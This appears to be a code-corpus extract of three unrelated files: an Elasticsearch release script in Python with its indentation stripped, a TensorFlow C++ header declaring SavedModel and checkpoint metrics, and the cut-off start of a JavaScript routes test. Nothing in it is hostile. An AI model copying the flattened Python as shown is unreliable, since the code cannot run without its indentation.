raise RuntimeError(msg)
try:
JAVA_HOME = env['JAVA_HOME']
except KeyError:
raise RuntimeError("""
Please set JAVA_HOME in the env before running release tool
On OSX use: export JAVA_HOME=`/usr/libexec/java_home -v '1.7*'`""")
try:
JAVA_HOME = env['JAVA7_HOME']
except KeyError:
pass #no JAVA7_HOME - we rely on JAVA_HOME
try:
# make sure mvn3 is used if mvn3 is available
# some systems use maven 2 as default
subprocess.check_output('mvn3 --version', shell=True, stderr=subprocess.STDOUT)
MVN = 'mvn3'
except subprocess.CalledProcessError:
MVN = 'mvn'
def java_exe():
path = JAVA_HOME
return 'export JAVA_HOME="%s" PATH="%s/bin:$PATH" JAVACMD="%s/bin/java"' % (path, path, path)
def verify_java_version(version):
s = os.popen('%s; java -version 2>&1' % java_exe()).read()
if ' version "%s.' % version not in s:
raise RuntimeError('got wrong version for java %s:\n%s' % (version, s))
# Verifies the java version. We guarantee that we run with Java 1.7
# If 1.7 is not available fail the build!
def verify_mvn_java_version(version, mvn):
s = os.popen('%s; %s --version 2>&1' % (java_exe(), mvn)).read()
if 'Java version: %s' % version not in s:
raise RuntimeError('got wrong java version for %s %s:\n%s' % (mvn, version, s))
# Returns the hash of the current git HEAD revision
def get_head_hash():
return os.popen(' git rev-parse --verify HEAD 2>&1').read().strip()
# Returns the hash of the given tag revision
def get_tag_hash(tag):
return os.popen('git show-ref --tags %s --hash 2>&1' % (tag)).read().strip()
# Returns the name of the current branch
def get_current_branch():
return os.popen('git rev-parse --abbrev-ref HEAD 2>&1').read().strip()
# Utility that returns the name of the release branch for a given version
def release_branch(version):
return 'release_branch_%s' % version
# runs get fetch on the given remote
def fetch(remote):
run('git fetch %s' % remote)
# Creates a new release branch from the given source branch
# and rebases the source branch from the remote before creating
# the release branch. Note: This fails if the source branch
# doesn't exist on the provided remote.
def create_release_branch(remote, src_branch, release):
run('git checkout %s' % src_branch)
run('git pull --rebase %s %s' % (remote, src_branch))
run('git checkout -b %s' % (release_branch(release)))
# Reads the given file and applies the
# callback to it. If the callback changed
# a line the given file is replaced with
# the modified input.
def process_file(file_path, line_callback):
fh, abs_path = tempfile.mkstemp()
modified = False
with open(abs_path,'w', encoding='utf-8') as new_file:
with open(file_path, encoding='utf-8') as old_file:
for line in old_file:
new_line = line_callback(line)
modified = modified or (new_line != line)
new_file.write(new_line)
os.close(fh)
if modified:
#Remove original file
os.remove(file_path)
#Move new file
shutil.move(abs_path, file_path)
return True
else:
# nothing to do - just remove the tmp file
os.remove(abs_path)
return False
# Walks the given directory path (defaults to 'docs')
# and replaces all 'coming[$version]' tags with
# 'added[$version]'. This method only accesses asciidoc files.
def update_reference_docs(release_version, path='docs'):
pattern = 'coming[%s' % (release_version)
replacement = 'added[%s' % (release_version)
pending_files = []
def callback(line):
return line.replace(pattern, replacement)
for root, _, file_names in os.walk(path):
for file_name in fnmatch.filter(file_names, '*.asciidoc'):
full_path = os.path.join(root, file_name)
if process_file(full_path, callback):
pending_files.append(os.path.join(root, file_name))
return pending_files
# Moves the pom.xml file from a snapshot to a release
def remove_maven_snapshot(pom, release):
pattern = '<version>%s-SNAPSHOT</version>' % (release)
replacement = '<version>%s</version>' % (release)
def callback(line):
return line.replace(pattern, replacement)
process_file(pom, callback)
# Moves the Version.java file from a snapshot to a release
def remove_version_snapshot(version_file, release):
# 1.0.0.Beta1 -> 1_0_0_Beta1
release = release.replace('.', '_')
pattern = 'new Version(V_%s_ID, true' % (release)
replacement = 'new Version(V_%s_ID, false' % (release)
def callback(line):
return line.replace(pattern, replacement)
process_file(version_file, callback)
# Stages the given files for the next git commit
def add_pending_files(*files):
for file in files:
run('git add %s' % (file))
# Executes a git commit with 'release [version]' as the commit message
def commit_release(release):
run('git commit -m "release [%s]"' % release)
def commit_feature_flags(release):
run('git commit -m "Update Documentation Feature Flags [%s]"' % release)
def tag_release(release):
run('git tag -a v%s -m "Tag release version %s"' % (release, release))
def run_mvn(*cmd):
for c in cmd:
run('%s; %s %s' % (java_exe(), MVN, c))
def build_release(release_version, run_tests=False, dry_run=True, cpus=1, bwc_version=None):
target = 'deploy'
if dry_run:
target = 'package'
if run_tests:
run_mvn('clean',
'test -Dtests.jvms=%s -Des.node.mode=local' % (cpus),
'test -Dtests.jvms=%s -Des.node.mode=network' % (cpus))
if bwc_version:
print('Running Backwards compatibility tests against version [%s]' % (bwc_version))
run_mvn('clean', 'test -Dtests.filter=@backwards -Dtests.bwc.version=%s -Dtests.bwc=true -Dtests.jvms=1' % bwc_version)
run_mvn('clean test-compile -Dforbidden.test.signatures="org.apache.lucene.util.LuceneTestCase\$AwaitsFix @ Please fix all bugs before release"')
# dont sign the RPM, so older distros will be able to use the uploaded RPM package
gpg_args = '-Dgpg.key="%s" -Dgpg.passphrase="%s" -Ddeb.sign=true -Drpm.sign=false' % (env.get('GPG_KEY_ID'), env.get('GPG_PASSPHRASE'))
if env.get('GPG_KEYRING'):
gpg_args += ' -Dgpg.keyring="%s"' % env.get('GPG_KEYRING')
run_mvn('clean %s -DskipTests %s' % (target, gpg_args))
success = False
try:
# create additional signed RPM for the repositories
run_mvn('-f distribution/rpm/pom.xml package -DskipTests -Dsign.rpm=true -Drpm.outputDirectory=target/releases/signed/ %s' % (gpg_args))
rpm = os.path.join('target/releases/signed', 'elasticsearch-%s.rpm' % release_version)
if os.path.isfile(rpm):
log('Signed RPM [%s] contains: ' % rpm)
run('rpm -pqli %s' % rpm)
success = True
finally:
if not success:
print("""
RPM Bulding failed make sure "rpm" tools are installed.
Use on of the following commands to install:
$ brew install rpm # on OSX
$ apt-get install rpm # on Ubuntu et.al
""")
# Uses the github API to fetch open tickets for the given release version
# if it finds any tickets open for that version it will throw an exception
def ensure_no_open_tickets(version):
version = "v%s" % version
conn = HTTPSConnection('api.github.com')
try:
log('Checking for open tickets on Github for version %s' % version)
log('Check if node is available')
conn.request('GET', '/repos/elastic/elasticsearch/issues?state=open&labels=%s' % version, headers= {'User-Agent' : 'Elasticsearch version checker'})
res = conn.getresponse()
if res.status == 200:
issues = json.loads(res.read().decode("utf-8"))
if issues:
urls = []
for issue in issues:
urls.append(issue['html_url'])
raise RuntimeError('Found open issues for release version %s:\n%s' % (version, '\n'.join(urls)))
else:
log("No open issues found for version %s" % version)
else:
raise RuntimeError('Failed to fetch issue list from Github for release version %s' % version)
except socket.error as e:
log("Failed to fetch issue list from Github for release version %s' % version - Exception: [%s]" % (version, e))
#that is ok it might not be there yet
finally:
conn.close()
def wait_for_node_startup(host='127.0.0.1', port=9200,timeout=15):
for _ in range(timeout):
conn = HTTPConnection(host, port, timeout)
try:
log('Waiting until node becomes available for 1 second')
time.sleep(1)
log('Check if node is available')
conn.request('GET', '')
res = conn.getresponse()
if res.status == 200:
return True
except socket.error as e:
log("Failed while waiting for node - Exception: [%s]" % e)
#that is ok it might not be there yet
finally:
conn.close()
return False
# Ensures we are using a true Lucene release, not a snapshot build:
def verify_lucene_version():
s = open('pom.xml', encoding='utf-8').read()
if 'download.elastic.co/lucenesnapshots' in s:
raise RuntimeError('pom.xml contains download.elastic.co/lucenesnapshots repository: remove that before releasing')
m = re.search(r'<lucene.version>(.*?)</lucene.version>', s)
if m is None:
raise RuntimeError('unable to locate lucene.version in pom.xml')
lucene_version = m.group(1)
m = re.search(r'<lucene.maven.version>(.*?)</lucene.maven.version>', s)
if m is None:
raise RuntimeError('unable to locate lucene.maven.version in pom.xml')
lucene_maven_version = m.group(1)
if lucene_version != lucene_maven_version:
raise RuntimeError('pom.xml is still using a snapshot release of lucene (%s): cutover to a real lucene release before releasing' % lucene_maven_version)
# Checks the pom.xml for the release version.
# This method fails if the pom file has no SNAPSHOT version set ie.
# if the version is already on a release version we fail.
# Returns the next version string ie. 0.90.7
def find_release_version(src_branch):
run('git checkout %s' % src_branch)
with open('pom.xml', encoding='utf-8') as file:
for line in file:
match = re.search(r'<version>(.+)-SNAPSHOT</version>', line)
if match:
return match.group(1)
raise RuntimeError('Could not find release version in branch %s' % src_branch)
def artifact_names(release):
artifacts = []
artifacts.append(os.path.join('distribution/zip/target/releases', 'elasticsearch-%s.zip' % (release)))
artifacts.append(os.path.join('distribution/tar/target/releases', 'elasticsearch-%s.tar.gz' % (release)))
artifacts.append(os.path.join('distribution/deb/target/releases', 'elasticsearch-%s.deb' % (release)))
artifacts.append(os.path.join('distribution/rpm/target/releases', 'elasticsearch-%s.rpm' % (release)))
return artifacts
def get_artifacts(release):
common_artifacts = artifact_names(release)
for f in common_artifacts:
if not os.path.isfile(f):
raise RuntimeError('Could not find required artifact at %s' % f)
return common_artifacts
# Sample URL:
# http://download.elasticsearch.org/elasticsearch/release/org/elasticsearch/distribution/elasticsearch-rpm/2.0.0-beta1-SNAPSHOT/elasticsearch-rpm-2.0.0-beta1-SNAPSHOT.rpm
def download_and_verify(release, files, plugins=None, base_url='https://download.elastic.co/elasticsearch/release/org/elasticsearch/distribution'):
print('Downloading and verifying release %s from %s' % (release, base_url))
tmp_dir = tempfile.mkdtemp()
try:
downloaded_files = []
for file in files:
name = os.path.basename(file)
if name.endswith('tar.gz'):
url = '%s/tar/elasticsearch/%s/%s' % (base_url, release, name)
elif name.endswith('zip'):
url = '%s/zip/elasticsearch/%s/%s' % (base_url, release, name)
elif name.endswith('rpm'):
url = '%s/rpm/elasticsearch/%s/%s' % (base_url, release, name)
elif name.endswith('deb'):
url = '%s/deb/elasticsearch/%s/%s' % (base_url, release, name)
abs_file_path = os.path.join(tmp_dir, name)
print(' Downloading %s' % (url))
downloaded_files.append(abs_file_path)
urllib.request.urlretrieve(url, abs_file_path)
url = ''.join([url, '.sha1'])
checksum_file = os.path.join(tmp_dir, ''.join([abs_file_path, '.sha1']))
urllib.request.urlretrieve(url, checksum_file)
print(' Verifying checksum %s' % (checksum_file))
run('cd %s && sha1sum -c %s' % (tmp_dir, os.path.basename(checksum_file)))
smoke_test_release(release, downloaded_files, get_tag_hash('v%s' % release), plugins)
print(' SUCCESS')
finally:
shutil.rmtree(tmp_dir)
def smoke_test_release(release, files, expected_hash, plugins):
for release_file in files:
if not os.path.isfile(release_file):
raise RuntimeError('Smoketest failed missing file %s' % (release_file))
tmp_dir = tempfile.mkdtemp()
if release_file.endswith('tar.gz'):
run('tar -xzf %s -C %s' % (release_file, tmp_dir))
elif release_file.endswith('zip'):
run('unzip %s -d %s' % (release_file, tmp_dir))
else:
log('Skip SmokeTest for [%s]' % release_file)
continue # nothing to do here
es_run_path = os.path.join(tmp_dir, 'elasticsearch-%s' % (release), 'bin/elasticsearch')
print(' Smoke testing package [%s]' % release_file)
es_plugin_path = os.path.join(tmp_dir, 'elasticsearch-%s' % (release),'bin/plugin')
plugin_names = {}
for name, plugin in plugins:
print(' Install plugin [%s] from [%s]' % (name, plugin))
run('%s; %s install %s' % (java_exe(), es_plugin_path, plugin))
plugin_names[name] = True
background = '-d'
print(' Starting elasticsearch deamon from [%s]' % os.path.join(tmp_dir, 'elasticsearch-%s' % release))
run('%s; %s -Des.node.name=smoke_tester -Des.cluster.name=prepare_release -Des.discovery.zen.ping.multicast.enabled=false -Des.script.inline=on -Des.script.indexed=on %s'
% (java_exe(), es_run_path, background))
conn = HTTPConnection('127.0.0.1', 9200, 20);
wait_for_node_startup()
try:
try:
conn.request('GET', '')
res = conn.getresponse()
if res.status == 200:
version = json.loads(res.read().decode("utf-8"))['version']
if release != version['number']:
raise RuntimeError('Expected version [%s] but was [%s]' % (release, version['number']))
if version['build_snapshot']:
raise RuntimeError('Expected non snapshot version')
if version['build_hash'].strip() != expected_hash:
raise RuntimeError('HEAD hash does not match expected [%s] but got [%s]' % (expected_hash, version['build_hash']))
print(' Running REST Spec tests against package [%s]' % release_file)
run_mvn('test -Dtests.cluster=%s -Dtests.jvms=1 -Dtests.class=*.*RestTests' % ("127.0.0.1:9300"))
print(' Verify if plugins are listed in _nodes')
conn.request('GET', '/_nodes?plugin=true&pretty=true')
res = conn.getresponse()
if res.status == 200:
nodes = json.loads(res.read().decode("utf-8"))['nodes']
for _, node in nodes.items():
node_plugins = node['plugins']
for node_plugin in node_plugins:
if not plugin_names.get(node_plugin['name'], False):
raise RuntimeError('Unexpeced plugin %s' % node_plugin['name'])
del plugin_names[node_plugin['name']]
if plugin_names:
raise RuntimeError('Plugins not loaded %s' % list(plugin_names.keys()))
else:
raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
else:
raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
finally:
conn.request('POST', '/_cluster/nodes/_local/_shutdown')
time.sleep(1) # give the node some time to shut down
if conn.getresponse().status != 200:
raise RuntimeError('Expected HTTP 200 but got %s on node shutdown' % res.status)
finally:
conn.close()
shutil.rmtree(tmp_dir)
def merge_tag_push(remote, src_branch, release_version, dry_run):
run('git checkout %s' % src_branch)
run('git merge %s' % release_branch(release_version))
run('git tag v%s' % release_version)
if not dry_run:
run('git push %s %s' % (remote, src_branch)) # push the commit
run('git push %s v%s' % (remote, release_version)) # push the tag
else:
print(' dryrun [True] -- skipping push to remote %s' % remote)
def publish_repositories(version, dry_run=True):
if dry_run:
print('Skipping package repository update')
else:
print('Triggering repository update for version %s - calling dev-tools/build_repositories.sh %s' % (version, src_branch))
# src_branch is a version like 1.5/1.6/2.0/etc.. so we can use this
run('dev-tools/build_repositories.sh %s' % src_branch)
def print_sonatype_notice():
settings = os.path.join(os.path.expanduser('~'), '.m2/settings.xml')
if os.path.isfile(settings):
with open(settings, encoding='utf-8') as settings_file:
for line in settings_file:
if line.strip() == '<id>sonatype-nexus-snapshots</id>':
# moving out - we found the indicator no need to print the warning
return
print("""
NOTE: No sonatype settings detected, make sure you have configured
your sonatype credentials in '~/.m2/settings.xml':
<settings>
...
<servers>
<server>
<id>sonatype-nexus-snapshots</id>
<username>your-jira-id</username>
<password>your-jira-pwd</password>
</server>
<server>
<id>sonatype-nexus-staging</id>
<username>your-jira-id</username>
<password>your-jira-pwd</password>
</server>
</servers>
...
</settings>
""")
def check_command_exists(name, cmd):
try:
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
raise RuntimeError('Could not run command %s - please make sure it is installed' % (name))
VERSION_FILE = 'src/main/java/org/elasticsearch/Version.java'
POM_FILE = 'pom.xml'
# finds the highest available bwc version to test against
def find_bwc_version(release_version, bwc_dir='backwards'):
log(' Lookup bwc version in directory [%s]' % bwc_dir)
bwc_version = None
if os.path.exists(bwc_dir) and os.path.isdir(bwc_dir):
max_version = [int(x) for x in release_version.split('.')]
for dir in os.listdir(bwc_dir):
if os.path.isdir(os.path.join(bwc_dir, dir)) and dir.startswith('elasticsearch-'):
version = [int(x) for x in dir[len('elasticsearch-'):].split('.')]
if version < max_version: # bwc tests only against smaller versions
if (not bwc_version) or version > [int(x) for x in bwc_version.split('.')]:
bwc_version = dir[len('elasticsearch-'):]
log(' Using bwc version [%s]' % bwc_version)
else:
log(' bwc directory [%s] does not exists or is not a directory - skipping' % bwc_dir)
return bwc_version
def ensure_checkout_is_clean(branchName):
# Make sure no local mods:
s = subprocess.check_output('git diff --shortstat', shell=True)
if len(s) > 0:
raise RuntimeError('git diff --shortstat is non-empty: got:\n%s' % s)
# Make sure no untracked files:
s = subprocess.check_output('git status', shell=True).decode('utf-8', errors='replace')
if 'Untracked files:' in s:
raise RuntimeError('git status shows untracked files: got:\n%s' % s)
# Make sure we are on the right branch (NOTE: a bit weak, since we default to current branch):
if 'On branch %s' % branchName not in s:
raise RuntimeError('git status does not show branch %s: got:\n%s' % (branchName, s))
# Make sure we have all changes from origin:
if 'is behind' in s:
raise RuntimeError('git status shows not all changes pulled from origin; try running "git pull origin %s": got:\n%s' % (branchName, s))
# Make sure we no local unpushed changes (this is supposed to be a clean area):
if 'is ahead' in s:
raise RuntimeError('git status shows local commits; try running "git fetch origin", "git checkout %s", "git reset --hard origin/%s": got:\n%s' % (branchName, branchName, s))
# Checks all source files for //NORELEASE comments
def check_norelease(path='src'):
pattern = re.compile(r'\bnorelease\b', re.IGNORECASE)
for root, _, file_names in os.walk(path):
for file_name in fnmatch.filter(file_names, '*.java'):
full_path = os.path.join(root, file_name)
line_number = 0
with open(full_path, 'r', encoding='utf-8') as current_file:
for line in current_file:
line_number = line_number + 1
if pattern.search(line):
raise RuntimeError('Found //norelease comment in %s line %s' % (full_path, line_number))
def run_and_print(text, run_function):
try:
print(text, end='')
run_function()
print(COLOR_OK + 'OK' + COLOR_END)
return True
except RuntimeError:
print(COLOR_FAIL + 'NOT OK' + COLOR_END)
return False
def check_env_var(text, env_var):
try:
print(text, end='')
env[env_var]
print(COLOR_OK + 'OK' + COLOR_END)
return True
except KeyError:
print(COLOR_FAIL + 'NOT OK' + COLOR_END)
return False
def check_environment_and_commandline_tools(check_only):
checks = list()
checks.append(check_env_var('Checking for AWS env configuration AWS_SECRET_ACCESS_KEY_ID... ', 'AWS_SECRET_ACCESS_KEY'))
checks.append(check_env_var('Checking for AWS env configuration AWS_ACCESS_KEY_ID... ', 'AWS_ACCESS_KEY_ID'))
checks.append(check_env_var('Checking for SONATYPE env configuration SONATYPE_USERNAME... ', 'SONATYPE_USERNAME'))
checks.append(check_env_var('Checking for SONATYPE env configuration SONATYPE_PASSWORD... ', 'SONATYPE_PASSWORD'))
checks.append(check_env_var('Checking for GPG env configuration GPG_KEY_ID... ', 'GPG_KEY_ID'))
checks.append(check_env_var('Checking for GPG env configuration GPG_PASSPHRASE... ', 'GPG_PASSPHRASE'))
checks.append(check_env_var('Checking for S3 repo upload env configuration S3_BUCKET_SYNC_TO... ', 'S3_BUCKET_SYNC_TO'))
checks.append(check_env_var('Checking for git env configuration GIT_AUTHOR_NAME... ', 'GIT_AUTHOR_NAME'))
checks.append(check_env_var('Checking for git env configuration GIT_AUTHOR_EMAIL... ', 'GIT_AUTHOR_EMAIL'))
checks.append(run_and_print('Checking command: rpm... ', partial(check_command_exists, 'rpm', 'rpm --version')))
checks.append(run_and_print('Checking command: dpkg... ', partial(check_command_exists, 'dpkg', 'dpkg --version')))
checks.append(run_and_print('Checking command: gpg... ', partial(check_command_exists, 'gpg', 'gpg --version')))
checks.append(run_and_print('Checking command: expect... ', partial(check_command_exists, 'expect', 'expect -v')))
checks.append(run_and_print('Checking command: createrepo... ', partial(check_command_exists, 'createrepo', 'createrepo --version')))
checks.append(run_and_print('Checking command: s3cmd... ', partial(check_command_exists, 's3cmd', 's3cmd --version')))
checks.append(run_and_print('Checking command: apt-ftparchive... ', partial(check_command_exists, 'apt-ftparchive', 'apt-ftparchive --version')))
# boto, check error code being returned
location = os.path.dirname(os.path.realpath(__file__))
command = 'python %s/upload-s3.py -h' % (location)
checks.append(run_and_print('Testing boto python dependency... ', partial(check_command_exists, 'python-boto', command)))
checks.append(run_and_print('Checking java version... ', partial(verify_java_version, '1.7')))
checks.append(run_and_print('Checking java mvn version... ', partial(verify_mvn_java_version, '1.7', MVN)))
if check_only:
sys.exit(0)
if False in checks:
print("Exiting due to failing checks")
sys.exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Builds and publishes a Elasticsearch Release')
parser.add_argument('--branch', '-b', metavar='RELEASE_BRANCH', default=get_current_branch(),
help='The branch to release from. Defaults to the current branch.')
parser.add_argument('--cpus', '-c', metavar='1', default=1,
help='The number of cpus to use for running the test. Default is [1]')
parser.add_argument('--skiptests', '-t', dest='tests', action='store_false',
help='Skips tests before release. Tests are run by default.')
parser.set_defaults(tests=True)
parser.add_argument('--remote', '-r', metavar='origin', default='origin',
help='The remote to push the release commit and tag to. Default is [origin]')
parser.add_argument('--publish', '-d', dest='dryrun', action='store_false',
help='Publishes the release. Disable by default.')
parser.add_argument('--smoke', '-s', dest='smoke', default='',
help='Smoke tests the given release')
parser.add_argument('--bwc', '-w', dest='bwc', metavar='backwards', default='backwards',
help='Backwards compatibility version path to use to run compatibility tests against')
parser.add_argument('--check-only', dest='check_only', action='store_true',
help='Checks and reports for all requirements and then exits')
parser.set_defaults(dryrun=True)
parser.set_defaults(smoke=None)
parser.set_defaults(check_only=False)
args = parser.parse_args()
bwc_path = args.bwc
src_branch = args.branch
remote = args.remote
run_tests = args.tests
dry_run = args.dryrun
cpus = args.cpus
build = not args.smoke
smoke_test_version = args.smoke
check_environment_and_commandline_tools(args.check_only)
# we print a notice if we can not find the relevant infos in the ~/.m2/settings.xml
print_sonatype_notice()
# we require to build with 1.7
verify_java_version('1.7')
verify_mvn_java_version('1.7', MVN)
if os.path.exists(LOG):
raise RuntimeError('please remove old release log %s first' % LOG)
if not dry_run:
print('WARNING: dryrun is set to "false" - this will push and publish the release')
input('Press Enter to continue...')
print(''.join(['-' for _ in range(80)]))
print('Preparing Release from branch [%s] running tests: [%s] dryrun: [%s]' % (src_branch, run_tests, dry_run))
print(' JAVA_HOME is [%s]' % JAVA_HOME)
print(' Running with maven command: [%s] ' % (MVN))
if build:
check_norelease(path='src')
ensure_checkout_is_clean(src_branch)
verify_lucene_version()
release_version = find_release_version(src_branch)
ensure_no_open_tickets(release_version)
if not dry_run:
smoke_test_version = release_version
head_hash = get_head_hash()
run_mvn('clean') # clean the env!
print(' Release version: [%s]' % release_version)
create_release_branch(remote, src_branch, release_version)
print(' Created release branch [%s]' % (release_branch(release_version)))
success = False
try:
pending_files = [POM_FILE, VERSION_FILE]
remove_maven_snapshot(POM_FILE, release_version)
remove_version_snapshot(VERSION_FILE, release_version)
print(' Done removing snapshot version')
add_pending_files(*pending_files) # expects var args use * to expand
commit_release(release_version)
pending_files = update_reference_docs(release_version)
version_head_hash = None
# split commits for docs and version to enable easy cherry-picking
if pending_files:
add_pending_files(*pending_files) # expects var args use * to expand
commit_feature_flags(release_version)
version_head_hash = get_head_hash()
print(' Committed release version [%s]' % release_version)
print(''.join(['-' for _ in range(80)]))
print('Building Release candidate')
input('Press Enter to continue...')
if not dry_run:
print(' Running maven builds now and publish to Sonatype and S3 - run-tests [%s]' % run_tests)
else:
print(' Running maven builds now run-tests [%s]' % run_tests)
build_release(release_version, run_tests=run_tests, dry_run=dry_run, cpus=cpus, bwc_version=find_bwc_version(release_version, bwc_path))
artifacts = get_artifacts(release_version)
smoke_test_release(release_version, artifacts, get_head_hash(), PLUGINS)
print(''.join(['-' for _ in range(80)]))
print('Finish Release -- dry_run: %s' % dry_run)
input('Press Enter to continue...')
print(' merge release branch, tag and push to %s %s -- dry_run: %s' % (remote, src_branch, dry_run))
merge_tag_push(remote, src_branch, release_version, dry_run)
print(' Updating package repositories -- dry_run: %s' % dry_run)
publish_repositories(src_branch, dry_run=dry_run)
cherry_pick_command = '.'
if version_head_hash:
cherry_pick_command = ' and cherry-pick the documentation changes: \'git cherry-pick %s\' to the development branch' % (version_head_hash)
pending_msg = """
Release successful pending steps:
* create a new vX.Y.Z label on github for the next release, with label color #dddddd (https://github.com/elastic/elasticsearch/labels)
* publish the maven artifacts on Sonatype: https://oss.sonatype.org/index.html
- here is a guide: http://central.sonatype.org/pages/releasing-the-deployment.html
* check if the release is there https://oss.sonatype.org/content/repositories/releases/org/elasticsearch/elasticsearch/%(version)s
* announce the release on the website / blog post
* tweet about the release
* announce the release in the google group/mailinglist
* Move to a Snapshot version to the current branch for the next point release%(cherry_pick)s
"""
print(pending_msg % { 'version' : release_version, 'cherry_pick' : cherry_pick_command} )
success = True
finally:
if not success:
run('git reset --hard HEAD')
run('git checkout %s' % src_branch)
elif dry_run:
run('git reset --hard %s' % head_hash)
run('git tag -d v%s' % release_version)
# we delete this one anyways
run('git branch -D %s' % (release_branch(release_version)))
else:
print("Skipping build - smoketest only against version %s" % smoke_test_version)
run_mvn('clean') # clean the env!
if smoke_test_version:
fetch(remote)
download_and_verify(smoke_test_version, artifact_names(smoke_test_version), plugins=PLUGINS)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
// APIs for accessing SavedModel and checkpoint metric objects.
//
// In order to collect the data from these metrics, please add the metrics to
// the provided monitoring platform. Unless configured with a user-specified
// monitoring platform, the data is not collected in OSS.
#ifndef TENSORFLOW_CC_SAVED_MODEL_METRICS_H_
#define TENSORFLOW_CC_SAVED_MODEL_METRICS_H_
#include <cstdint>
#include <string>
#include <utility>
#include "absl/status/statusor.h"
#include "absl/strings/string_view.h"
#include "tensorflow/core/lib/monitoring/counter.h"
#include "tensorflow/core/lib/monitoring/gauge.h"
#include "tensorflow/core/lib/monitoring/sampler.h"
#include "tensorflow/core/protobuf/fingerprint.pb.h"
namespace tensorflow {
namespace metrics {
const char kFingerprintFound[] = "FOUND";
const char kFingerprintNotFound[] = "NOT_FOUND";
const char kFingerprintError[] = "ERROR";
// Returns "/tensorflow/core/saved_model/write/count" cell. This metric
// has 1 field "write_version", which is equal to the
// `tensorflow::libexport::GetWriteVersion` of the protobuf and should be
// incremented when a SavedModel has been successfully written.
monitoring::CounterCell& SavedModelWriteCount(absl::string_view write_version);
// Returns "/tensorflow/core/saved_model/read/count" cell. This metric
// has 1 field "write_version", which is equal to the
// `tensorflow::libexport::GetWriteVersion` of the protobuf, and should be
// incremented when a SavedModel has been successfully read.
monitoring::CounterCell& SavedModelReadCount(absl::string_view write_version);
// Returns "/tensorflow/core/saved_model/write/api" cell. This metric has 1
// field "api_label" which corresponds to a SavedModel write API. The cell for
// `foo` should be incremented when the write API `foo` is called.
monitoring::CounterCell& SavedModelWriteApi(absl::string_view api_label);
// Returns "/tensorflow/core/saved_model/read/api" cell. This metric has 1
// field "api_label" which corresponds to a SavedModel read API. The cell for
// `foo` should be incremented when the read API `foo` is called.
monitoring::CounterCell& SavedModelReadApi(absl::string_view api_label);
// Returns "/tensorflow/core/saved_model/write/fingerprint" cell, which contains
// the saved_model_checksum of the SM's fingerprint when it is exported.
monitoring::GaugeCell<std::string>& SavedModelWriteFingerprint();
// Returns "/tensorflow/core/saved_model/write/path" cell, which contains
// the saved_model_path of the SM when it is exported.
monitoring::GaugeCell<std::string>& SavedModelWritePath();
// Returns "/tensorflow/core/saved_model/write/path_and_fingerprint" cell, which
// contains the path (saved_model_path) and fingerprint (concatenation of
// graph_def_program_hash, signature_def_hash, saved_object_graph_hash,
// and checkpoint_hash) of the SavedModel when it is exported.
monitoring::GaugeCell<std::string>& SavedModelWritePathAndSingleprint();
// Returns "/tensorflow/core/saved_model/read/fingerprint" cell, wich contains
// the saved_model_checksum of the SM's fingerprint when it is imported.
monitoring::GaugeCell<std::string>& SavedModelReadFingerprint();
// Returns "/tensorflow/core/saved_model/read/path" cell, wich contains
// the saved_model_path of the SM when it is imported.
monitoring::GaugeCell<std::string>& SavedModelReadPath();
// Returns "/tensorflow/core/saved_model/read/path_and_fingerprint" cell, which
// contains the path (saved_model_path) and singleprint (concatenation of
// graph_def_program_hash, signature_def_hash, saved_object_graph_hash,
// and checkpoint_hash) of the SavedModel when it is imported.
monitoring::GaugeCell<std::string>& SavedModelReadPathAndSingleprint();
// Returns the fingerprint as a Json string.
std::string MakeFingerprintJson(FingerprintDef fingerprint_def);
// Returns canonical string concatenation of path and singleprint.
absl::StatusOr<std::string> MakeSavedModelPathAndSingleprint(
std::string path, std::string singleprint);
// Returns path and singleprint as a pair, parsed canonically from the string
// metric.
absl::StatusOr<std::pair<std::string, std::string>>
ParseSavedModelPathAndSingleprint(std::string path_and_singleprint);
// Returns string status indicating whether or not the fingerprint.pb file was
// found when loading the SavedModel.
monitoring::GaugeCell<std::string>& SavedModelFoundFingerprintOnLoad();
// Returns "/tensorflow/core/checkpoint/read/read_durations" cell belonging to
// field `api_label`.
monitoring::SamplerCell& CheckpointReadDuration(absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/write_durations" cell belonging to
// field `api_label`.
monitoring::SamplerCell& CheckpointWriteDuration(absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/async_write_durations" cell
// belonging to field `api_label`.
monitoring::SamplerCell& AsyncCheckpointWriteDuration(
absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/training_time_saved" cell
// belonging to field `api_label`.
monitoring::CounterCell& TrainingTimeSaved(absl::string_view api_label);
// Returns "/tensorflow/core/checkpoint/write/checkpoint_size" cell
// belonging to field (`api_label`, `filesize`).
monitoring::CounterCell& CheckpointSize(absl::string_view api_label,
int64_t filesize);
// Returns "/tensorflow/core/checkpoint/sharding/callback_duration" cell which
// describes how long it took to execute the checkpoint sharding callback in
// microseconds.
monitoring::CounterCell& ShardingCallbackDuration();
// Returns "/tensorflow/core/checkpoint/sharding/num_checkpoint_shards_written"
// cell which describes how many checkpoint shard files were written during
// saving.
monitoring::CounterCell& NumCheckpointShardsWritten();
// Returns "/tensorflow/core/checkpoint/sharding/callback_description" cell
// which describes the callback used to shard the checkpoint during saving.
monitoring::GaugeCell<std::string>& ShardingCallbackDescription();
} // namespace metrics
} // namespace tensorflow
#endif // TENSORFLOW_CC_SAVED_MODEL_METRICS_H_
|
c
|
github
|
https://github.com/tensorflow/tensorflow
|
tensorflow/cc/saved_model/metrics.h
|
import { defineRoutes } from "../defineRoutes";
describe("defineRoutes", () => {
it("returns an array of routes", () => {
let routes = defineRoutes((route) => {
route("/", "routes/home.js");
route("inbox", "routes/inbox.js", () => {
route("/", "routes/inbox/index.js", { index: true });
route(":messageId", "routes/inbox/$messageId.js");
route("archive", "routes/inbox/archive.js");
});
});
expect(routes).toMatchInlineSnapshot(`
{
"routes/home": {
